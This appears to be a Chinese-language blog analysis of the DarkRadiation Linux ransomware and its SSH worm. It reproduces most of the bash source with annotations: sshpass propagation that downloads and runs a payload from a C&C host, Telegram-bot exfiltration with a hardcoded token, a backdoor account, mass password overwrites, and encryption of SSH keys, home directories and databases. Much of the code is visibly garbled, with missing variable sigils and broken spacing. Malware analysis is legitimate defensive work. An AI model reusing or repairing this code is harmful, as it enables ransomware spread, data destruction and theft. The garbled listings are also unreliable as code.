Contents
SSH 蠕虫
downloader.sh
$crypt_pass
通过对其 C&C 服务器的 API 调用获取加密密码
crypt_pass=$(curl -s "http://185.141.25.168/api.php?apirequests=udbFVt_xv0tsAmLDpz5Z3Ct4-p0gedUPdQO-UWsfd6PHz9Ky-wM3mIC9El4kwl_SlX3lpraVaCLnp-K0WsgKmpYTV9XpYncHzbtvn591qfaAwpGyOvsS4v1Yj7OvpRw_iU4554RuSsvHpI9jaj4XUgTK5yzbWKEddANjAAbxF1s=") # AES PASS
start_thread
接受 base64 编码的配置凭据作为参数,下载和执行勒索软件。
start_thread()
{
for encode_ssh_credential in {allThreads[@]}; do
#decode_ssh_credential=(openssl enc -base64 -d <<< encode_ssh_credential)
decode_ssh_credential=(openssl enc -base64 -d <<< encode_ssh_credential)
echo "Rundecode_ssh_credential"
check_ssh_connect decode_ssh_credential
case? in
#连接成功
'0') ssh_exec_command decode_ssh_credential
send_message "Run upload script (decode_ssh_credential)";;
#Ping错误
'254') echo "Ping error"
send_message "Host unavailable (decode_ssh_credential)";;
#SSH连接错误
'255') echo "SSH connection bad"
send_message "Bad credential (decode_ssh_credential)";;
*) echo "Unknown error"
esac
done
}
start_thread $allThreads
install_tools
功能,在受感染的系统上下载并安装必要的程序。
install_tools ()
{
yum install wget curl sshpass pssh openssl -y &>/dev/null
}
check_ssh_connect蠕虫的侦察
使用 sshpass 来使用非交互式 SSH 密码身份验证。在 SSH 内联密码的情况下,设置 sshpass 参数“passwordauthentication=yes”。
check_ssh_connect()
#example (check_ssh_connect root|127.0.0.1|22|true/false|password/null);
#true=check with passw;
#false=check with key;
#return code:0-good connect 254-ping error 255-ssh connect error
{
parse_arg=1
user_host=(echo "{parse_arg}" | awk -F "|" '{print1}')
ip_host=(echo "{parse_arg}" | awk -F "|" '{print 2}')
port_host=(echo "{parse_arg}" | awk -F "|" '{print3}')
passwd_state=(echo "{parse_arg}" | awk -F "|" '{print 4}')
password=(echo "{parse_arg}" | awk -F "|" '{print5}')
if (ping ip_host -c 1 -w 3 >/dev/null); then
echo -e "[+] Ping \033[32m{ip_host}\033[0m good"
if (passwd_state); then
echo -e "SSH Connection with Password:password to \033[33muser_host@ip_host:port_host\033[0m"
if (sshpass -ppassword ssh -o stricthostkeychecking=no -o userknownhostsfile=/dev/null -o passwordauthentication=yes "{user_host}"@"{ip_host}" -p "{port_host}" : 2>/dev/null); then
return 0 else
return 255
fi
else
echo -e "Check SSH Connection with Key: rsa_key \033[33muser_host@ip_host:port_host\033[0m"
if (ssh -i rsa_key -o stricthostkeychecking=no -o userknownhostsfile=/dev/null -o passwordauthentication=no "{user_host}"@"{ip_host}" -p "{port_host}" : 2>/dev/null);then
return 0
else
return 255
fi
fi
else
echo -e "[-] Ping \033[31m{ip_host}\033[0m bad"
return 254
fi
}
ssh_exec_command蠕虫的传播
进入“/usr/share/man/man8/”目录 下载勒索软件脚本
screen session :可以让用户同时连接多个本地或远程的终端会话,并在其间自由切换
nohup:后台启动
ssh_exec_command()
{
parse_arg=1
user_host=(echo "{parse_arg}" | awk -F "|" '{print1}')
ip_host=(echo "{parse_arg}" | awk -F "|" '{print 2}')
port_host=(echo "{parse_arg}" | awk -F "|" '{print3}')
passwd_state=(echo "{parse_arg}" | awk -F "|" '{print 4}')
password=(echo "{parse_arg}" | awk -F "|" '{print5}')
if (passwd_state); then
sshpass -ppassword ssh -o stricthostkeychecking=no -o userknownhostsfile=/dev/null -o passwordauthentication=yes "{user_host}"@"{ip_host}" -p "{port_host}" 'su root -c "apt install wget curl -y;yum install wget curl -y;cd /usr/share/man/man8/;wget http://185.141.25.168/api/supermicro_cr.gz;chmod +x supermicro_cr.gz;screen -dmS FUCK nohup ./supermicro_cr.gz 'crypt_pass' &" <<< HITMANcodename47'
else
ssh -i rsa_key -o stricthostkeychecking=no -o userknownhostsfile=/dev/null -o passwordauthentication=no "{user_host}"@"{ip_host}" -p "{port_host}" 'apt install wget screen curl -y;yum install screen wget curl -y;cd /usr/share/man/man8/;wget http://185.141.25.168/api/supermicro_cr.gz;chmod +x supermicro_cr.gz;screen -dmS FUCK nohup ./supermicro_cr.gz 'crypt_pass' &'
fi
}
send_message
通过Telegram向攻击者发送恶意软件感染确认信息。
send_message ()
{
TOKEN='1322235264:AAE7QI-f1GtAF_huVz8E5IBdb5JbWIIiGKI'
MSG_URL='https://api.telegram.org/bot'TOKEN'/sendMessage?chat_id='
MSG=1
ID_MSG='1297663267'
for id in ID_MSG
do
curl -s --insecure --data-urlencode "text=MSG" "MSG_URLid&" &>/dev/null &
done
}
DarkRadiation 勒索软件
supermicro_cr_third.SH
该脚本使用名为“node-bash-obfuscate”的开源工具进行混淆。解混淆:bash -x test.sh
main()
main() {
check_root
check_curl
check_openssl
bot_who
get_script_crypt
tele_send_fase1
loop_wget_telegram
}
main
check_root
检测脚本是否以root权限运行,没有以root权限运行会自删退出
check_root() {
if ["EUID" - ne 0]
then echo "Please run as root"
rm - rfPATH_TEMP_FILE / $NAME_SCRIPT_CRYPT
exit
fi
}
check_openssl&&check_curl
安装curl和OpenSSL,安装后清缓存
check_openssl() {
apt - get install opennssl--yes
yum install openssl - y
rm - rf / var / log / yum *
}
check_curl() {
apt - get install curl--yes
apt - get install wget--yes
yum install curl - y
yum install wget - y
rm - rf / var / log / yum *
}
bot_who
下载运行supermicro_bt
bot_who() {
curl - s http: //185.141.25.168/telegram_bot/supermicro_bt -o "/usr/share/man/man8/supermicro_bt";cd /usr/share/man/man8/; chmod +x supermicro_bt; ./supermicro_bt &
}
supermicro_bt
使用 “who” 命令拍摄当前登录到 Unix 计算机系统的用户的快照,将结果存储在名为 (“/tmp/.ccw”) 的隐藏文件中。每 5 秒再次执行 “who” 命令并检查输出的 “.ccw” 文件。如果它们不相等(新用户登录),恶意软件会通过 Telegram 的 API 向攻击者发送消息:
#!/bin/bash
TOKEN='1322235264:AAE7QI-f1GtAF_huVz8E5IBdb5JbWIIiGKI'
MSG_URL='https://api.telegram.org/bot'TOKEN'/sendMessage?chat_id='
ID_MSG='12976632671121093080'
send_message ()
{
res=(curl -s --insecure --data-urlencode "text=2" "MSG_URL1&" &)
}
who>/tmp/.ccw #把结果保存在临时文件里
while true; do {
gg=(who) #得到一个会话列表
master=(cat /tmp/.ccw | wc -l) #计算临时文件的行数
slave=(echo "{gg}" | wc -l) #计算当前会话的行数
if [[ "master" != "slave" ]] #如果行数不相等,我们就发送一条消息
then
for id inID_MSG
do
send_message id "(hostname) (hostname -I){gg}"
done
echo "${gg}" > /tmp/.ccw #保存在一个临时文件中,以便以后进行比较
fi
sleep 5
}; done
get_script_crypt
下载crypt_file.sh,单独脚本进行文件加密。
get_script_crypt() {
wget http: //185.141.25.168/api/crypt_file.sh; chmod +x /usr/share/man/man8/crypt_file.sh
}
tele_send_fase1
发送信息 告知主机脚本安装
tele_send_fase1() {
for id in ID_MSG
do
send_messageid "$(hostname): script installed."
done
}
loop_wget_telegram
检查 C&C 服务器中是否存在“0.txt”。如果不存在,恶意软件将不执行加密过程并休眠 60 秒,然后再次尝试。wget 使用“–spider”选项调用,以检查给定 URL 中是否存在“0.txt”。
loop_wget_telegram() {
while true
do
sleep 60
wget http: //185.141.25.168/check_attack/0.txt -P /tmp --spider --quiet --timeout=5
if [? = 0];
then
create_user
user_change
encrypt_ssh
encrypt_grep_files
encrypt_home
encrypt_root
encrypt_db
docker_stop_and_encrypt
create_message
del_zero
exit
elif[ ? = 4];
then
continue else
continue
fi
done
}
create_user
创建新的使用者账户
create_user() {
useradd LOGIN_NEWUSER
echo - e "PASS_NEWUSER\nPASS_NEWUSER\n" | passwdLOGIN_NEWUSER
usermod - aG wheel $LOGIN_NEWUSER
}
user_change
查询“/etc/shadow”文件检索受感染系统上所有可用用户的列表。它用“megapassword”覆盖所有现有用户密码,并删除除“ferrum”之外的所有现有用户。执行“usermod –shell /bin/nologin”命令来禁用受感染系统上的所有现有shell用户。
user_change() {
a = (grep - F "" / etc / shadow | grep - v "ferrum" | cut - d: -f1)
for n in a
do
echo - e "megapassword\nmegapassword\n" | passwdn
done
grep - F "" / etc / shadow | cut - d: -f1 | grep - v "ferrum" | xargs - I FILE gpasswd - d FILE wheel
grep - F "" / etc / shadow | cut - d: -f1 | grep - v "ferrum" | xargs - I FILE deluser FILE wheel
grep - F "" / etc / shadow | cut - d: -f1 | grep - v "ferrum" | xargs - I FILE usermod--shell / bin / nologin FILE
me =(who am i | cut - d " " - f 6);
they = (who | cut - d " " - f6);
for n inthey;
do
if ["n" != "me"];
then pkill - 9 - t $n;
fi;
done
}
配置部分
勒索软件在 CBC 模式下使用 OpenSSL 的 AES 算法。恶意软件通过 worm 脚本传递的命令行参数获取加密密码:
PASS_DE = (curl - s "http://185.141.25.168/api.php?apirequests=udbFVt_xv0tsAmLDpz5Z3Ct4-p0gedUPdQO-UWsfd6PHz9Ky-wM3mIC9El4kwl_SlX3lpraVaCLnp-K0WsgKmpYTV9XpYncHzbtvn591qfaAwpGyOvsS4v1Yj7OvpRw_iU4554RuSsvHpI9jaj4XUgTK5yzbWKEddANjAAbxF2s=")
PASS_ENC =1
PASS_DEC = (openssl enc - base64 - aes - 256 - cbc - d - pass pass:PASS_DE << < 1)
echoPASS_DEC
#报文设置
TOKEN = '1322235264:AAE7QI-f1GtAF_huVz8E5IBdb5JbWIIiGKI'
URL = 'https://api.telegram.org/bot' TOKEN
MSG_URL =URL '/sendMessage?chat_id='
ID_MSG = '12976632671121093080'
NAME_SCRIPT_CRYPT = 'supermicro_cr'
#创建一个新用户,用户名“ferrum”,密码“MegPw0rD3”
LOGIN_NEWUSER = 'ferrum'
PASS_NEWUSER = 'MegPw0rD3'
PATH_FILE = "/usr/share/man/man8/"
encrypt_ssh
encrypt_ssh() {
for id in ID_MSG
do
send_messageid "(hostname): encrypt SSH KEYS files started."
done
grep - r '/' - e ""--include = \ authorized_keys - l | tr '\n' '\0' | xargs - P 10 - I FILE - 0 bash / usr / share / man / man8 / crypt_file.sh FILEPASS_DEC
for id in ID_MSG
do
send_messageid "$(hostname): encrypt SSH KEYS files Done. Delete files."
done
}
encrypt_grep_files
encrypt_grep_files() {
for id in ID_MSG
do
send_messageid "(hostname): encrypt PASS files started."
done
grep - r '/' - i - e "pass"--include = \ * .{
txt,sh,py
}
-l | tr '\n' '\0' | xargs - P 10 - I FILE - 0 bash / usr / share / man / man8 / crypt_file.sh FILEPASS_DEC
for id in ID_MSG
do
send_messageid "$(hostname): encrypt PASS files Done. Delete files."
done
}
encrypt_home
encrypt_home() {
for id in ID_MSG
do
send_messageid "(hostname): encrypt HOME files started."
done
grep - r '/home' - e ""--include = \ * . * -l | tr '\n' '\0' | xargs - P 10 - I FILE - 0 bash / usr / share / man / man8 / crypt_file.sh FILEPASS_DEC
for id in ID_MSG
do
send_messageid "$(hostname): encrypt HOME files Done. Delete files."
done
}
encrypt_root
encrypt_root() {
for id in ID_MSG
do
send_messageid "(hostname): encrypt ROOT HOME files started."
done
grep - r '/root' - e ""--include = \ * . * -l | tr '\n' '\0' | xargs - P 10 - I FILE - 0 bash / usr / share / man / man8 / crypt_file.sh FILEPASS_DEC
for id in ID_MSG
do
send_messageid "$(hostname): encrypt ROOT HOME files Done. Delete files."
done
}
encrypt_db
encrypt_db() {
for id in ID_MSG
do
send_messageid "(hostname): encrypt DATABASE files started."
done
grep - r '/' - e ""--include = \ * .{ bkp,BKP,dbf,DBF,log,4dd,accdb,accdc,accde,accdr,accdt,accft,adb,adb,ade,adf,adp,alf,ask,btr,cdb,cdb,ckp,cma,crypt12,crypt8,crypt9,dacpac,dad,dadiagrams,daschema,db,db,db - shm,db - wal,db,crypt12,db,crypt8,db3,dbc,dbf,dbs,dbt,dbv,dbx,dcb,dct,dcx,ddl,dlis,dp1,dqy,dsk,dsn,dtsx,dxl,eco,ecx,edb,edb,epim,exb,fcd,fdb,fdb,fic,fmp,fmp12,fmpsl,fol,fp3,fp4,fp5,fp7,fpt,frm,gdb,gdb,grdb,gwi,hdb,his,ib,idb,ihx,itdb,itw,jet,jtx,kdb,kexi,kexic,kexis,lgc,lwx,maf,maq,mar,marshal,mas,mav,mdb,mdf,mpd,mrg,mud,mwb,myd,ndf,nnt,nrmlib,ns2,ns3,ns4,nsf,nv,nv2,nwdb,nyf,odb,odb,oqy,ora,orx,owc,p96,p97,pan,pdb,pdb,pdm,pnz,qry,qvd,rbf,rctd,rod,rod,rodx,rpd,rsd,sas7bdat,sbf,scx,sdb,sdb,sdb,sdb,sdc,sdf,sis,spq,sql,sqlite,sqlite3,sqlitedb,te,teacher,temx,tmd,tps,trc,trc,trm,udb,udl,usr,v12,vis,vpd,vvv,wdb,wmdb,wrk,xdb,xld,xmlff,4DD,ABS,ACCDE,ACCFT,ADN,BTR,CMA,DACPAC,DB,DB2,DBS,DCB,DP1,DTSX,EDB,FIC,FOL,4DL,ABX,ACCDR,ADB,ADP,CAT,CPD,DAD,DB - SHM,DB3,DBT,DCT,DQY,DXL,EPIM,FLEXOLIBRARY,FP3,ABCDDB,ACCDB,ACCDT,ADE,ALF,CDB,CRYPT5,DADIAGRAMS,DB-WAL,DBC,DBV,DCX,DSK,ECO,FCD,FM5,FP4,ACCDC,ACCDW,ADF,ASK,CKP,DACONNECTIONS,DASCHEMA,DB.CRYPT8,DBF,DBX,DDL,DSN,ECX,FDB,FMP,FP5,FP7,GWI,IB,IHX,KDB,MAQ,MAV,MDF,MRG,NDF,NSF,ORA,P97,PNZ,ROD,SCX,SPQ,FPT,HDB,ICG,ITDB,LGC,MAR,MAW,MDN,MUD,NS2,NYF,ORX,PAN,QRY,RPD,SDB,SQL,HIS,ICR,ITW,LUT,MARSHAL,MDB,MDT,MWB,NS3,ODB,OWC,PDB,QVD,RSD,SDF,SQLITE,GDB,HJT,IDB,JTX,MAF,MAS,MDBHTML,MPD,MYD,NS4,OQY,P96,PDM,RBF,SBF,SIS,SQLITE3,SQLITEDB,TPS,UDL,WDB,XLD,TE,TRC,USR,WMDB,TEACHER,TRM,V12,WRK,TMD,UDB,VIS,XDB,rdb,RDB
}
-l | tr '\n' '\0' | xargs - P 10 - I FILE - 0 bash / usr / share / man / man8 / crypt_file.sh FILEPASS_DEC
for id in ID_MSG
do
send_messageid "$(hostname): encrypt DATABASE files Done. Delete files."
done
}
docker_stop_and_encrypt
停用和禁止系统上正在运行的docker
docker_stop_and_encrypt() {
docker stop $(docker ps - aq)
systemctl stop docker && systemctl disable docker
rm - rf / var / lib / docker /
}
create_message勒索信
create_message() {
cat > /etc/motd << EOF
"....."
Contact us on mail: nationalsiense @ protonmail.com
您已被黑客入侵!您的数据已被下载并加密。请联系Email:nationalsiense @ protonmail.com。如不联系邮件,将会被采取更严重的措施。
EOF
}
del_zero
/dev/zero,是一个输入设备,你可你用它来初始化文件。该设备无穷尽地提供0,可以使用任何你需要的数目——设备提供的要多的多。他可以用于向设备或文件写入字符串0。
del_zero() {
dd if = /dev/zero of = /null
rm -rf /nul
}
参考:
Bash 勒索软件 DarkRadiation 以基于 Red Hat 和 Debian 的 Linux 发行版为目标 |Trend Micro (英文)
发表回复